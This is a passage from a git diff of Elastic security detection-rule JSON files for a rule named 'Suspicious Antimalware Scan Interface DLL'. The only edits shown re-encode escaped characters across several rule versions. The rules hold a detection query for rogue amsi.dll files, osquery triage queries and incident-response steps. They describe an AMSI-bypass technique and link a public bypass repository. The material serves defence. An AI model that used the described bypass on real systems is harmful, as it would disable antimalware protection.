user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribuition\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json index e803d354910..bda3d18adc4 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribuition\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json index daa2327e145..bce17d45e1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribuition\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json index 3b0ee407295..c901b8c853f 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json index e52dfb82791..0bea1d776ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible 